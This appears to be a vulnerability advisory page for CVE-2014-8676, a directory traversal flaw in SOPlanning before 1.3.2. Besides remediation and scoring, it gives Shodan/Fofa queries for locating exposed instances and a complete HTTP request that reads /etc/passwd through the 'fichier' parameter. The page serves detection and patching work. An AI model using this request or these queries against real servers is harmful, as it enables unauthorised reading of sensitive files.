🔙 목록으로 돌아가기

CVE-2014-8676: Simple Online Planning Tool <1.3.2 - Local File Inclusion

TitleSimple Online Planning Tool <1.3.2 - Local File Inclusion
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server.
RemediationUpgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability.
CVSS Score5.3
EPSS Score0.72418
CVE IDCVE-2014-8676
CWE IDCWE-22
Shodan Queryhttp.html:"soplanning"
Fofa Querybody="soplanning"
Tags cve2014 cve packetstorm edb seclists soplanning lfi xss vuln

🔍 Vulnerability Description

SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.

🌐 HTTP Request

GET /process/feries.php?fichier=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-8676.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-8676.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A